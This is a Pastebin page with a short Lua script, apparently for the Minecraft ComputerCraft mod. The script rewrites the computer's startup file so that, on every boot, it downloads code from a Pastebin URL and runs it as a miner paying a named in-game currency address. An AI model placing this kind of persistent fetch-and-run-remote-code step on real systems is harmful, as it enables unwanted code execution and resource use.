Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local f = fs.open("startup", "w")
- f.write([[
- local h = http.get "https://pastebin.com/raw/DKriPmPe"
- local f = fs.open("miner", "w")
- f.write(h.readAll())
- f.close()
- h.close()
- shell.run "miner MinerMan132@switchcraft.kst"
- ]])
- f.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement